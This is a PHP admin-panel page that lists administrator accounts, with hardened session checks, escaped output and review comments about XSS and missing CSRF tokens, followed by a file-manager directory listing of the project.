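<?php
/**
 * Admin accounts listing page.
 *
 * Flow, as visible in this file:
 *   1. Start output buffering and the session.
 *   2. Allow access only when the manager session marker is set, the session
 *      type is "manager_session_alliwan" and the session uid is 1 or 2;
 *      otherwise redirect to index.php.
 *   3. Load every row of `royaladmin` except adminid 1 and 2, newest id first.
 *   4. Render one table row per admin with POST forms that target
 *      ac_edit_admin.php (delete / activate / suspend) and
 *      ac_edit_admininfo.php (edit).
 *
 * init.php is expected to provide $conn (a prepared-statement capable
 * connection) and the page header; neither is visible here, so confirm there.
 */
ob_start();
session_start();

// Authorisation gate. All three keys must exist before they are read, and the
// comparisons are strict: with loose `==` a non-string session value (e.g.
// integer 0 on PHP 7, or boolean true) would compare equal to the expected
// type string and let the request through.
$isManagerSession = isset(
    $_SESSION['user_liwwan_admin_2023930'],
    $_SESSION['type'],
    $_SESSION['uid']
)
    && $_SESSION['type'] === 'manager_session_alliwan'
    && in_array((string) $_SESSION['uid'], ['1', '2'], true);

if (!$isManagerSession) {
    // Nothing has been written to the buffer yet, so the redirect header is still sendable.
    header('Location:index.php');
    exit;
}

$pageTitle  = 'alliwan / Admins ';
include 'init.php';

// Fetch only the columns this page prints. `SELECT *` would also pull any
// credential columns the table may hold into page memory for no reason.
// `AND` replaces the MySQL-only `&&` operator; the filter is unchanged.
$stmt = $conn->prepare(
    "SELECT adminid, username, fullname, active, adddate
       FROM royaladmin
      WHERE adminid != 1 AND adminid != 2
      ORDER BY adminid DESC"
);
$stmt->execute();
$rows = $stmt->fetchAll();

// HTML-escape every database value before it reaches the page. username and
// fullname are free text stored by other admin forms; echoing them raw is a
// stored XSS sink that would run in a manager's session.
$escapeHtml = static function ($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
};
?>
<section class="con-benfs">
    <h1 class="member-h1"> Admins </h1>
    <div class="container-fluid">
        <a href ="add_admin.php" class="btn-add fw-bold">+ New admin</a><br>
        <div class="table-responsive my-4">
            <table class="main-table text-center table table-bordered ">
                <tr>
                    <td>#ID</td>
                    <td>username</td>
                    <td>Full Name</td>
                    <td>status</td>
                    <td>Regesterd Date</td>
                    <td class="w-25">Control</td>
                </tr>
                <?php
                // NOTE(review): the forms below trigger state changes (delete,
                // activate, suspend) by POST and carry no anti-CSRF token in
                // this file. The handlers ac_edit_admin.php and
                // ac_edit_admininfo.php are not visible here; confirm that they
                // verify a per-session token and re-check the caller's
                // privileges and the submitted ad_id server-side.
                foreach ($rows as $row) :
                    $adminId = $escapeHtml($row['adminid']);
                    $status  = (int) $row['active'];
                ?>
                <tr>
                    <td><?php echo $adminId; ?></td>
                    <td><?php echo $escapeHtml($row['username']); ?></td>
                    <td><?php echo $escapeHtml($row['fullname']); ?></td>
                    <td><?php
                        // 0 = suspended, 1 = active; any other value prints nothing.
                        if ($status === 0) {
                            echo "موقوف";
                        } elseif ($status === 1) {
                            echo "مفعل";
                        }
                    ?></td>
                    <td><?php echo $escapeHtml($row['adddate']); ?></td>
                    <td>
                        <div class="row">
                            <div class="col-lg-4 col-sm-12 mt-1">
                                <form action="ac_edit_admin.php" method="POST">
                                    <input type="hidden" name="ad_id" value="<?php echo $adminId; ?>">
                                    <button type="submit" name="delete_admin" onclick="return confirm('متأكد من حذف المستخدم');" class="w-100 btn btn-danger fw-bold bg-none border-0">D</button>
                                </form>
                            </div>
                            <div class="col-lg-4 col-sm-12 mt-1">
                                <form action="ac_edit_admininfo.php" method="POST">
                                    <input type="hidden" name="ad_id" value="<?php echo $adminId; ?>">
                                    <button type="submit" name="edit_admin" class="w-100 btn btn-info fw-bold bg-none border-0">ED</button>
                                </form>
                            </div>
                            <?php if ($status === 0) : ?>
                            <div class="col-lg-4 col-sm-12 mt-1">
                                <form action="ac_edit_admin.php" method="POST">
                                    <input type="hidden" name="ad_id" value="<?php echo $adminId; ?>">
                                    <button type="submit" name="active_admin" onclick="return confirm('متأكد من تفعيل حساب المستخدم');" class="w-100 btn btn-success fw-bold bg-none border-0">Act</button>
                                </form>
                            </div>
                            <?php endif; ?>
                            <?php if ($status === 1) : ?>
                            <div class="col-lg-4 col-sm-12 mt-1">
                                <form action="ac_edit_admin.php" method="POST">
                                    <input type="hidden" name="ad_id" value="<?php echo $adminId; ?>">
                                    <button type="submit" name="pend_admin" onclick="return confirm('متأكد من إلغاء تفعيل حساب المستخدم');" class="w-100 btn btn-warning fw-bold bg-none border-0">Pend</button>
                                </form>
                            </div>
                            <?php endif; ?>
                        </div>
                    </td>
                </tr>
                <?php endforeach; ?>
            </table>
        </div>

        <a href ="add_admin.php" class="btn-add fw-bold">+ New admin</a>

    </div>
</section>
<?php
include 'assets/includes/template/footer.php';

ob_end_flush();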

Filemanager

Name Type Size Permission Actions
assets Folder 0755
images Folder 0755
ac_citycalc.php File 15.27 KB 0644
ac_edit_admin.php File 2.67 KB 0644
ac_edit_admininfo.php File 4.36 KB 0644
ac_edit_imgs.php File 34.27 KB 0644
ac_edit_pr.php File 10.72 KB 0644
ac_projects.php File 5.24 KB 0644
ac_workshops.php File 18.62 KB 0644
add_admin.php File 4.32 KB 0644
add_customer_template.php File 11.1 KB 0644
add_project.php File 17.22 KB 0644
add_workshop.php File 5.15 KB 0644
admins.php File 4.81 KB 0644
citycalc.php File 5.01 KB 0644
cons_orders.php File 4.51 KB 0644
custommer_templates.php File 4.59 KB 0644
dashboard.php File 4.11 KB 0644
edit_cus_template.php File 11.74 KB 0644
editadminpassword.php File 5.17 KB 0644
error_log File 309.84 KB 0644
imgs.php File 18.17 KB 0644
index.php File 3.19 KB 0644
init.php File 183 B 0644
logout.php File 186 B 0644
newsletter.php File 3.13 KB 0644
projects.php File 13.89 KB 0644
projects_card.php File 13.29 KB 0644
show.php File 8.81 KB 0644
workshop_details.php File 12.08 KB 0644
workshops.php File 4.63 KB 0644